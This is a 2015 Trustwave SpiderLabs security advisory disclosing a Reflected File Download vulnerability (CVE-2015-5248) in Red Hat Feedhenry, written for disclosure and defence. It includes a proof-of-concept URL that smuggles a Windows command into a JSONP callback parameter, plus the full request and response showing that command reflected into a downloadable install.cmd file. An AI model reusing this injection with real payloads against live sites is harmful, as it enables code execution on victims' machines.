Trustwave SpiderLabs Security Advisory TWSL2015-017: Reflected File Download in Red Hat Feedhenry Published: 10/09/2015 Version: 1.0 Vendor: Red Hat Inc. (http://www.redhat.com/) Product: Feedhenry Enterprise Mobile Application Platform Product description: Mobile Platform for Enterprise. Accelerate collaboration & development on Mobile Projects. Finding 1: Reflected File Download in RedHat Feedhenry Credit: Maciej Grela of Trustwave CVE: CVE-2015-5248 A particular request used by the Feedhenry mobile app hosting platform is vulnerable to Reflected File Download [1] in certain browsers. Consider the following URL: https://example.feedhenry.com/box/srv/1.1/app/init/install.cmd?_callback=start%20notepad.exe%0d%0a&_jsonpdata={%22appid%22:%22%22,%22appkey%22:%22%22} A similar URL is used by the application code at initialization, the above was significantly optimized. Please note, that the appid and appkey values need to be valid. Fetching this URL results in the following request/response pair: 8<------------------------------------------------ GET /box/srv/1.1/app/init/install.cmd?_callback=start%20notepad.exe%0d%0a&_jsonpdata={%22appid%22:%22%22,%22appkey%22:%22%22} HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: example.feedhenry.com 8<------------------------------------------------ Response: 8<------------------------------------------------ HTTP/1.1 200 OK Date: Mon, 30 Mar 2015 13:01:28 GMT Expires: Sat, 6 May 1995 12:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate P3P: CP="ALL ADM DEV PSAi COM OUR OTRo STP IND ONL" policyref="/box/p3p.xml" Pragma: no-cache Cache-Control: post-check=0, pre-check=0 Last-Modified: Mon, 30 Mar 2015 13:01:28 GMT ETag: "" Content-Type: text/javascript;charset=UTF-8 Vary: Accept-Encoding Content-Length: 392 start notepad.exe ({"apptitle":"Fake App","domain":"example","firstTime":false,"hosts":{"debugCloudType":"node","debugCloudUrl":"https://debug-url.feedhenry.net","releaseCloudType":"node","releaseCloudUrl":"https://release-url.feedhenry.net"},"init":{"trackId":""},"status":"ok"}); 8<------------------------------------------------ This kind of result in a response will be interpreted by certain browsers (IE8 on Windows 7 [3] was tested as a proof of concept) as an apparent file download from the example.feedhenry.com domain. Despite Same-origin policies, the attacker has complete control of both the file name (install.cmd) and contents of the file. This allows the attacker to execute arbitrary code when the victim launches the downloaded file. Vendor Response: Red Hat Software acknowledged the vulnerability and the organization advised that it will be patched. However, at this time there is no response regarding the time-frame when it will be patched. Remediation Steps: Please refer to the BlackHat 2014 talk [2] and TW Spiderlabs blog [1] for more details about this vulnerability and ways to mitigate it. Revision History: 03/31/2015 - Vulnerability disclosed to vendor 05/06/2015 - Vendor acknowledged vulnerability 07/16/2015 - Contact vendor regarding status 08/17/2015 - Vendor advises that it should be patched within a week 08/20/2015 - Attempted to contact vendor regarding status 09/01/2015 - Attempted to contact vendor regarding status 09/18/2015 - Attempted to contact vendor regarding status 09/24/2015 - Attempted to contact vendor regarding status 10/01/2015 - Attempted to contact vendor regarding status 10/09/2015 - Advisory published References 1. https://www.trustwave.com/Resources/SpiderLabs-Blog/Reflected-File-Download---A-New-Web-Attack-Vector/ 2. https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf 3. https://www.modern.ie/en-us/virtualization-tools About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risks. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs while safely embracing business imperatives including big data, BYOD and social media. More than 2.5 million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective data protection, risk management and threat intelligence. Trustwave is a privately held company, headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.